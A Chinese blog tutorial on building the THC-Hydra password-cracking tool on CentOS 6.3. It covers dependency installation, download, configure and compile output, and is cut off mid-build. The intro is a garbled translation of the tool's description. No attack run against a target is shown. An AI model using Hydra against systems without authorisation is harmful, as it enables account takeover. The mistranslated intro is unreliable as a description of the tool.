首先還是書寫本文的
參考檔:http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html
工具介紹:原文為官方英文解釋本人給翻譯下
數量最大的安全漏洞之一是密碼,每個密碼安全研究顯示。 Hydra是一個parallized登錄的裂解裝置,它支持眾多的協議來攻擊。新的模塊很容易的添加,旁邊,它是靈活的,而且速度非常快。
水潤測試上編譯的Linux,Windows/ Cygwin的中,Solaris 11中的FreeBSD8.1和OSX,可根據GPLv3的一個特殊的OpenSSL許可證授權擴展。
目前該工具支持:
AFP,使思科,思科認證,思科AAA,CVS,火鳥,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP頭,HTTP代理,HTTPS-FORM-GET,HTTPS-FORM POST,IMAP,HTTP代理,HTTPS的GET,HTTPS頭,ICQ,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle的監聽器,Oracle的SID,甲骨文,PCAnywhere中,PCNFS,POP3,POSTGRES,RDP,REXEC,Rlogin的,RSH,SAP/R3,SIP,SMB,SMTP,SNMP,SMTP枚舉,SOCKS5,SSH(v1和v2),顛覆,使用TeamSpeak(TS2),遠程登錄,VMware的認證,VNC和XMPP。
對於HTTP,POP3,IMAP和SMTP,支持幾個登錄機制,如平原和MD5摘要等。
這個工具是一個概念證明代碼,給研究人員和安全顧問可行顯示,這將是多么容易獲得未經授權的訪問從遠程系統。
面包車豪斯和大衛Maciejak的維護程序。
黑客選擇
http://www.thc.org/thc-hydra
本人的實驗環境借用了 centos6.3 這里注明下本人剛接觸Linux是RHEL也就是RedHad的企業版本。了解CentOS后知道centos為rhel的克隆版理論是兼容rhel的所有包的
所以該下演示的步驟和包同樣可用在rhel的OS上。假如你的服務器是RHEL的但為激活使用yum可以參考本人博客的博文 RHEL使用centos的yum源修改教程:http://www.cnblogs.com/patf/articles/3137348.html
廢話不多說首先安裝的是hydra的支持庫包軟件
1 yum -y install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
假如-y選項,因為本人在安裝的時候 沒有加入所以有兩三次提示我 -y可以默認yes
1 Verifying : subversion-devel-1.6.11-9.el6_4.i686 26/59 2 Verifying : db4-cxx-4.7.25-17.el6.i686 27/59 3 Verifying : postgresql-libs-8.4.13-1.el6_3.i686 28/59 4 Verifying : openldap-devel-2.4.23-32.el6_4.1.i686 29/59 5 Verifying : cyrus-sasl-plain-2.1.23-13.el6_3.1.i686 30/59 6 Verifying : openldap-2.4.23-32.el6_4.1.i686 31/59 7 Verifying : krb5-workstation-1.10.3-10.el6_4.3.i686 32/59 8 Verifying : cyrus-sasl-lib-2.1.23-13.el6_3.1.i686 33/59 9 Verifying : postgresql-devel-8.4.13-1.el6_3.i686 34/59 10 Verifying : expat-devel-2.0.1-11.el6_2.i686 35/59 11 Verifying : libcom_err-devel-1.41.12-14.el6.i686 36/59 12 Verifying : krb5-devel-1.10.3-10.el6_4.3.i686 37/59 13 Verifying : krb5-libs-1.10.3-10.el6_4.3.i686 38/59 14 Verifying : cyrus-sasl-2.1.23-13.el6_3.1.i686 39/59 15 Verifying : cyrus-sasl-lib-2.1.23-13.el6.i686 40/59 16 Verifying : cyrus-sasl-2.1.23-13.el6.i686 41/59 17 Verifying : libss-1.41.12-12.el6.i686 42/59 18 Verifying : openssl-1.0.0-20.el6_2.5.i686 43/59 19 Verifying : subversion-1.6.11-7.el6.i686 44/59 20 Verifying : cyrus-sasl-gssapi-2.1.23-13.el6.i686 45/59 21 Verifying : e2fsprogs-1.41.12-12.el6.i686 46/59 22 Verifying : openldap-2.4.23-26.el6.i686 47/59 23 Verifying : libcom_err-1.41.12-12.el6.i686 48/59 24 Verifying : zlib-1.2.3-27.el6.i686 49/59 25 Verifying : pcre-7.8-4.el6.i686 50/59 26 Verifying : libselinux-2.0.94-5.3.el6.i686 51/59 27 Verifying : cyrus-sasl-plain-2.1.23-13.el6.i686 52/59 28 Verifying : libselinux-utils-2.0.94-5.3.el6.i686 53/59 29 Verifying : libselinux-python-2.0.94-5.3.el6.i686 54/59 30 Verifying : krb5-workstation-1.9-33.el6.i686 55/59 31 Verifying : krb5-libs-1.9-33.el6.i686 56/59 32 Verifying : e2fsprogs-libs-1.41.12-12.el6.i686 57/59 33 Verifying : apr-1.3.9-3.el6_1.2.i686 58/59 34 Verifying : cyrus-sasl-md5-2.1.23-13.el6.i686 59/59 35 36 Installed: 37 openssl-devel.i686 0:1.0.0-27.el6_4.2 pcre-devel.i686 0:7.8-6.el6 38 postgresql-devel.i686 0:8.4.13-1.el6_3 subversion-devel.i686 0:1.6.11-9.el6_4 39 40 Dependency Installed: 41 apr-devel.i686 0:1.3.9-5.el6_2 apr-util-devel.i686 0:1.3.9-3.el6_0.1 42 cyrus-sasl-devel.i686 0:2.1.23-13.el6_3.1 db4-cxx.i686 0:4.7.25-17.el6 43 db4-devel.i686 0:4.7.25-17.el6 expat-devel.i686 0:2.0.1-11.el6_2 44 keyutils-libs-devel.i686 0:1.4-4.el6 krb5-devel.i686 0:1.10.3-10.el6_4.3 45 libcom_err-devel.i686 0:1.41.12-14.el6 libselinux-devel.i686 0:2.0.94-5.3.el6_4.1 46 libsepol-devel.i686 0:2.0.41-4.el6 openldap-devel.i686 0:2.4.23-32.el6_4.1 47 postgresql.i686 0:8.4.13-1.el6_3 postgresql-libs.i686 0:8.4.13-1.el6_3 48 zlib-devel.i686 0:1.2.3-29.el6 49 50 Dependency Updated: 51 apr.i686 0:1.3.9-5.el6_2 cyrus-sasl.i686 0:2.1.23-13.el6_3.1 52 cyrus-sasl-gssapi.i686 0:2.1.23-13.el6_3.1 cyrus-sasl-lib.i686 0:2.1.23-13.el6_3.1 53 cyrus-sasl-md5.i686 0:2.1.23-13.el6_3.1 cyrus-sasl-plain.i686 0:2.1.23-13.el6_3.1 54 e2fsprogs.i686 0:1.41.12-14.el6 e2fsprogs-libs.i686 0:1.41.12-14.el6 55 krb5-libs.i686 0:1.10.3-10.el6_4.3 krb5-workstation.i686 0:1.10.3-10.el6_4.3 56 libcom_err.i686 0:1.41.12-14.el6 libselinux.i686 0:2.0.94-5.3.el6_4.1 57 libselinux-python.i686 0:2.0.94-5.3.el6_4.1 libselinux-utils.i686 0:2.0.94-5.3.el6_4.1 58 libss.i686 0:1.41.12-14.el6 openldap.i686 0:2.4.23-32.el6_4.1 59 openssl.i686 0:1.0.0-27.el6_4.2 pcre.i686 0:7.8-6.el6 60 subversion.i686 0:1.6.11-9.el6_4 zlib.i686 0:1.2.3-29.el6 61 62 Complete!
到這里所以支持都安裝完畢下面可以安裝hydra了
可以到官方找最新的包也可以按一下的方法下載
1 root@localhost ~]# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz 2 --2013-06-18 23:02:32-- http://www.thc.org/releases/hydra-7.4.1.tar.gz 3 正在解析主機 www.thc.org... 199.58.210.16 4 正在連接 www.thc.org|199.58.210.16|:80... 已連接。 5 已發出 HTTP 請求,正在等待回應... 200 OK 6 長度:666187 (651K) [application/x-gzip] 7 正在保存至: “hydra-7.4.1.tar.gz” 8 9 17% [==================> ] 114,105 35.6K/s eta(英國中部時19% [=====================> ] 131,481 38.3K/s eta(英國中部時23% [=========================> ] 154,649 41.7K/s eta(英國中部時28% [===============================> ] 190,849 47.6K/s eta(英國中部時34% [======================================> ] 227,049 53.7K/s eta(英國中部時36% [=========================================> ] 244,425 55.1K/s eta(英國中部時41% [==============================================> ] 273,385 58.6K/s eta(英國中部時46% [====================================================> ] 309,585 63.2K/s eta(英國中部時48% [======================================================> ] 322,617 62.4K/s eta(英國中部時53% [============================================================> ] 357,825 69.5K/s eta(英國中部時57% [=================================================================> ] 384,881 73.0K/s eta(英國中部時61% [=====================================================================> ] 406,601 83.8K/s eta(英國中部時62% [======================================================================> ] 415,289 82.7K/s eta(英國中部時71% [================================================================================> ] 473,209 95.3K/s eta(英國中部時74% [====================================================================================> ] 494,929 99.8K/s eta(英國中部時77% [=======================================================================================> ] 515,201 96.8K/s eta(英國中部時83% [===============================================================================================> ] 557,193 104K/s eta(英國中部時86% [==================================================================================================> ] 577,465 104K/s eta(英國中部時89% [=====================================================================================================> ] 594,841 95.4K/s eta(英國中部時94% [===========================================================================================================> ] 631,041 99.9K/s eta(英國中部時97% [===============================================================================================================> ] 651,313 98.4K/s eta(英國中部時100%[==================================================================================================================>] 666,187 94.0K/s in 8.6s 10 11 2013-06-18 23:02:41 (75.8 KB/s) - 已保存 “hydra-7.4.1.tar.gz” [666187/666187]) 12 13 [root@localhost ~]# tar zxvf hydra-7.4.1.tar.gz 14 hydra-7.4.2/ 15 hydra-7.4.2/bfg.c 16 hydra-7.4.2/bfg.h 17 hydra-7.4.2/CHANGES 18 hydra-7.4.2/configure 19 hydra-7.4.2/crc32.c 20 hydra-7.4.2/crc32.h 21 hydra-7.4.2/d3des.c 22 hydra-7.4.2/d3des.h 23 hydra-7.4.2/dpl4hydra.sh 24 hydra-7.4.2/dpl4hydra_full.csv 25 hydra-7.4.2/dpl4hydra_local.csv 26 hydra-7.4.2/hmacmd5.c 27 hydra-7.4.2/hmacmd5.h 28 hydra-7.4.2/hydra-afp.c 29 hydra-7.4.2/hydra-cisco-enable.c 30 hydra-7.4.2/hydra-cisco.c 31 hydra-7.4.2/hydra-cvs.c 32 hydra-7.4.2/hydra-firebird.c 33 hydra-7.4.2/hydra-ftp.c 34 hydra-7.4.2/hydra-gtk/ 35 hydra-7.4.2/hydra-gtk/acconfig.h 36 hydra-7.4.2/hydra-gtk/aclocal.m4 37 hydra-7.4.2/hydra-gtk/AUTHORS 38 hydra-7.4.2/hydra-gtk/autogen.sh 39 hydra-7.4.2/hydra-gtk/ChangeLog 40 hydra-7.4.2/hydra-gtk/config.h 41 hydra-7.4.2/hydra-gtk/config.h.in 42 hydra-7.4.2/hydra-gtk/configure 43 hydra-7.4.2/hydra-gtk/configure.in 44 hydra-7.4.2/hydra-gtk/COPYING 45 hydra-7.4.2/hydra-gtk/INSTALL 46 hydra-7.4.2/hydra-gtk/install-sh 47 hydra-7.4.2/hydra-gtk/Makefile.am 48 hydra-7.4.2/hydra-gtk/Makefile.in 49 hydra-7.4.2/hydra-gtk/make_xhydra.sh 50 hydra-7.4.2/hydra-gtk/missing 51 hydra-7.4.2/hydra-gtk/mkinstalldirs 52 hydra-7.4.2/hydra-gtk/NEWS 53 hydra-7.4.2/hydra-gtk/README 54 hydra-7.4.2/hydra-gtk/src/ 55 hydra-7.4.2/hydra-gtk/src/callbacks.c 56 hydra-7.4.2/hydra-gtk/src/callbacks.h 57 hydra-7.4.2/hydra-gtk/src/interface.c 58 hydra-7.4.2/hydra-gtk/src/interface.h 59 hydra-7.4.2/hydra-gtk/src/main.c 60 hydra-7.4.2/hydra-gtk/src/Makefile.am 61 hydra-7.4.2/hydra-gtk/src/Makefile.in 62 hydra-7.4.2/hydra-gtk/src/support.c 63 hydra-7.4.2/hydra-gtk/src/support.h 64 hydra-7.4.2/hydra-gtk/stamp-h.in 65 hydra-7.4.2/hydra-gtk/xhydra.glade 66 hydra-7.4.2/hydra-gtk/xhydra.gladep 67 hydra-7.4.2/hydra-http-form.c 68 hydra-7.4.2/hydra-http-proxy-urlenum.c 69 hydra-7.4.2/hydra-http-proxy.c 70 hydra-7.4.2/hydra-http.c 71 hydra-7.4.2/hydra-icq.c 72 hydra-7.4.2/hydra-imap.c 73 hydra-7.4.2/hydra-irc.c 74 hydra-7.4.2/hydra-ldap.c 75 hydra-7.4.2/hydra-logo.ico 76 hydra-7.4.2/hydra-logo.rc 77 hydra-7.4.2/hydra-mod.c 78 hydra-7.4.2/hydra-mod.h 79 hydra-7.4.2/hydra-mssql.c 80 hydra-7.4.2/hydra-mysql.c 81 hydra-7.4.2/hydra-ncp.c 82 hydra-7.4.2/hydra-nntp.c 83 hydra-7.4.2/hydra-oracle-listener.c 84 hydra-7.4.2/hydra-oracle-sid.c 85 hydra-7.4.2/hydra-oracle.c 86 hydra-7.4.2/hydra-pcanywhere.c 87 hydra-7.4.2/hydra-pcnfs.c 88 hydra-7.4.2/hydra-pop3.c 89 hydra-7.4.2/hydra-postgres.c 90 hydra-7.4.2/hydra-rdp.c 91 hydra-7.4.2/hydra-rexec.c 92 hydra-7.4.2/hydra-rlogin.c 93 hydra-7.4.2/hydra-rsh.c 94 hydra-7.4.2/hydra-sapr3.c 95 hydra-7.4.2/hydra-sip.c 96 hydra-7.4.2/hydra-smb.c 97 hydra-7.4.2/hydra-smtp-enum.c 98 hydra-7.4.2/hydra-smtp.c 99 hydra-7.4.2/hydra-snmp.c 100 hydra-7.4.2/hydra-socks5.c 101 hydra-7.4.2/hydra-ssh.c 102 hydra-7.4.2/hydra-sshkey.c 103 hydra-7.4.2/hydra-svn.c 104 hydra-7.4.2/hydra-teamspeak.c 105 hydra-7.4.2/hydra-telnet.c 106 hydra-7.4.2/hydra-vmauthd.c 107 hydra-7.4.2/hydra-vnc.c 108 hydra-7.4.2/hydra-xmpp.c 109 hydra-7.4.2/hydra.1 110 hydra-7.4.2/hydra.c 111 hydra-7.4.2/hydra.h 112 hydra-7.4.2/INSTALL 113 hydra-7.4.2/libpq-fe.h 114 hydra-7.4.2/LICENSE 115 hydra-7.4.2/LICENSE.OPENSSL 116 hydra-7.4.2/Makefile 117 hydra-7.4.2/Makefile.am 118 hydra-7.4.2/Makefile.orig 119 hydra-7.4.2/Makefile.unix 120 hydra-7.4.2/ntlm.c 121 hydra-7.4.2/ntlm.h 122 hydra-7.4.2/performance.h 123 hydra-7.4.2/postgres_ext.h 124 hydra-7.4.2/pw-inspector-logo.rc 125 hydra-7.4.2/pw-inspector.1 126 hydra-7.4.2/pw-inspector.c 127 hydra-7.4.2/pw-inspector.ico 128 hydra-7.4.2/rdp.h 129 hydra-7.4.2/README 130 hydra-7.4.2/sasl.c 131 hydra-7.4.2/sasl.h 132 hydra-7.4.2/xhydra.1 133 hydra-7.4.2/xhydra.png 134 [root@localhost ~]# cd hydra-7.4. 135 -bash: cd: hydra-7.4.: 沒有那個文件或目錄 136 [root@localhost ~]# cd hydra-7.4. 137 hydra-7.4.1.tar.gz hydra-7.4.2/ 138 [root@localhost ~]# cd hydra-7.4.2/
這里有點搞笑了,下載了一個7.4.1的包解壓是4.2的源 呵呵不管了反正新的包是向下兼容的進入到里面./configure --help下查看下
也沒什么直接./configure 然后無報錯就直接 make &&make install 即可
1 root@localhost hydra-7.4.2]# ./configure 2 3 Starting hydra auto configuration ... 4 Detected 32 Bit Linux OS 5 6 Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ... 7 ... found 8 Checking for idn (libidn.so) ... 9 ... NOT found, unicode logins and passwords will not be supported 10 Checking for curses (libcurses.so / term.h) ... 11 ... NOT found, color output disabled 12 Checking for pcre (libpcre.so, pcre.h) ... 13 ... found 14 Checking for Postgres (libpq.so, libpq-fe.h) ... 15 ... found 16 Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ... 17 ... found 18 Checking for firebird (libfbclient.so) ... 19 ... NOT found, module firebird disabled 20 Checking for MYSQL client (libmysqlclient.so, math.h) ... 21 ... NOT found, module Mysql will not support version > 4.x 22 Checking for AFP (libafpclient.so) ... 23 ... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway 24 Checking for NCP (libncp.so / nwcalls.h) ... 25 ... NOT found, module NCP disabled 26 Checking for SAP/R3 (librfc/saprfc.h) ... 27 ... NOT found, module sapr3 disabled 28 Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp 29 Checking for libssh (libssh/libssh.h) ... 30 ... NOT found, module ssh disabled 31 Get it from http://www.libssh.org 32 Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ... 33 ... NOT found, module Oracle disabled 34 Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html 35 Checking for GUI req's (pkg-config, gtk+-2.0) ... 36 ... NOT found, optional anyway 37 38 Hydra will be installed into .../bin of: /usr/local 39 (change this by running ./configure --prefix=path) 40 41 Writing Makefile.in ... 42 now type "make" 43 [root@localhost hydra-7.4.2]# make && make install 44 gcc -I. -O3 -o pw-inspector pw-inspector.c 45 gcc -I. -O3 -c hydra-vnc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 46 gcc -I. -O3 -c hydra-pcnfs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 47 gcc -I. -O3 -c hydra-rexec.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 48 gcc -I. -O3 -c hydra-nntp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 49 gcc -I. -O3 -c hydra-socks5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 50 gcc -I. -O3 -c hydra-telnet.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 51 gcc -I. -O3 -c hydra-cisco.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 52 gcc -I. -O3 -c hydra-http.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 53 gcc -I. -O3 -c hydra-ftp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 54 gcc -I. -O3 -c hydra-imap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 55 gcc -I. -O3 -c hydra-pop3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 56 gcc -I. -O3 -c hydra-smb.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 57 gcc -I. -O3 -c hydra-icq.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 58 gcc -I. -O3 -c hydra-cisco-enable.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 59 gcc -I. -O3 -c hydra-ldap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 60 gcc -I. -O3 -c hydra-mysql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 61 gcc -I. -O3 -c hydra-mssql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 62 gcc -I. -O3 -c hydra-xmpp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 63 gcc -I. -O3 -c hydra-http-proxy-urlenum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 64 gcc -I. -O3 -c hydra-snmp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 65 gcc -I. -O3 -c hydra-cvs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 66 gcc -I. -O3 -c hydra-smtp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 67 gcc -I. -O3 -c hydra-smtp-enum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 68 gcc -I. -O3 -c hydra-sapr3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 69 gcc -I. -O3 -c hydra-ssh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 70 gcc -I. -O3 -c hydra-sshkey.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 71 gcc -I. -O3 -c hydra-teamspeak.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 72 gcc -I. -O3 -c hydra-postgres.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 73 gcc -I. -O3 -c hydra-rsh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 74 gcc -I. -O3 -c hydra-rlogin.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 75 gcc -I. -O3 -c hydra-oracle-listener.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 76 gcc -I. -O3 -c hydra-svn.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 77 gcc -I. -O3 -c hydra-pcanywhere.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 78 gcc -I. -O3 -c hydra-sip.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 79 gcc -I. -O3 -c hydra-oracle-sid.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 80 gcc -I. -O3 -c hydra-oracle.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 81 gcc -I. -O3 -c hydra-vmauthd.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 82 gcc -I. -O3 -c hydra-firebird.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 83 gcc -I. -O3 -c hydra-afp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 84 gcc -I. -O3 -c hydra-ncp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 85 gcc -I. -O3 -c hydra-http-proxy.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 86 gcc -I. -O3 -c hydra-http-form.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 87 gcc -I. -O3 -c hydra-irc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 88 gcc -I. -O3 -c hydra-rdp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 89 gcc -I. -O3 -c crc32.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 90 gcc -I. -O3 -c d3des.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 91 gcc -I. -O3 -c bfg.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 92 gcc -I. -O3 -c ntlm.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 93 gcc -I. -O3 -c sasl.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 94 gcc -I. -O3 -c hmacmd5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 95 gcc -I. -O3 -c hydra-mod.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 96 gcc -I. -O3 -lm -o hydra hydra.c hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o hydra-pop3.o hydra-smb.o 